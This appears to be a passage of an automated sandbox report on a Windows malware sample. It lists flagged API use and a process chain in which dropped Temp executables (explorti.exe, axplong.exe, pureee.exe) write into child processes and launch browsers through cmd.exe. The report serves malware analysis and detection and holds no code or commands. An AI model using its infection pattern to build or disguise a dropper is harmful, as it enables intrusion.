N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\1000029002\e378e7234d.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3012 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3012 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3012 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3900 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe
PID 3900 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe
PID 3900 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe
PID 212 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe C:\Windows\system32\cmd.exe
PID 1160 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1160 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1160 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1160 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1160 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1160 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2664 wrote to memory of 4256 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2664 wrote to memory of 4256 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2868 wrote to memory of 2040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2868 wrote to memory of 2040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
